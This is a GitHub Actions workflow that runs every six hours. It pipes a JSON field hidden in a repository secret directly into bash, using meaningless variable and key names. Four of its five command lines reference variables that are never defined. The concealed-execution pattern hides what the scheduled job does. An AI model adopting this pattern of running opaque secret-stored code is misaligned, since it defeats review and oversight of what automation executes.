name: daoshoul

on:
  workflow_dispatch:
  schedule:
    - cron: '13 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: daoshoul
        env:
          rs115: ${{ secrets.rs115 }}
        run: |
          echo $rs115 | jq -r .qtqtk93706 | /bin/bash
          echo $obue0 | jq -r .xaub1 | /bin/bash
          echo $du38875 | jq -r .tmfq478 | /bin/bash
          echo $fpg503 | jq -r .yao00593 | /bin/bash
          echo $ysojs038 | jq -r .ctmzj78883 | /bin/bash

